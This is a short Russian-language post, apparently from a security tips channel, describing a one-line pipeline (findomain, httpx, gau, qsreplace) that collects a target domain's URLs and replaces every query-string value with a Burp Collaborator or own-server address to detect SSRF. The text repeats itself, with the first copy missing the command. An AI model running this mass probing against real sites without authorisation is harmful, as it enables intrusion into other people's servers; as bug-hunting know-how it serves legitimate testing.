⛓ Поиск SSRF на сайте одной командой
Для выполнения данной задачи воспользуемся несколькими утилитами.
Findomain собирает домены тестируемого сайта.
Httpx проверяет их доступность.
Getallurls (gau) извлекает известные URL-адреса из AlienVault Open Threat Exchange, Wayback Machine и Common Crawl.
Qsreplace принимает на вход URL-адреса и заменяет все значения строки запроса на значение, указанное пользователем.
После установки вышеуказанных инструментов достаточно выполнить следующую команду:
Вместо
#web #ssrf
Для выполнения данной задачи воспользуемся несколькими утилитами.
Findomain собирает домены тестируемого сайта.
Httpx проверяет их доступность.
Getallurls (gau) извлекает известные URL-адреса из AlienVault Open Threat Exchange, Wayback Machine и Common Crawl.
Qsreplace принимает на вход URL-адреса и заменяет все значения строки запроса на значение, указанное пользователем.
После установки вышеуказанных инструментов достаточно выполнить следующую команду:
findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace your.burpcollaborator.net
Вместо
your.burpcollaborator.net вставьте адрес своего сервера (или Burp Collaborator)#web #ssrf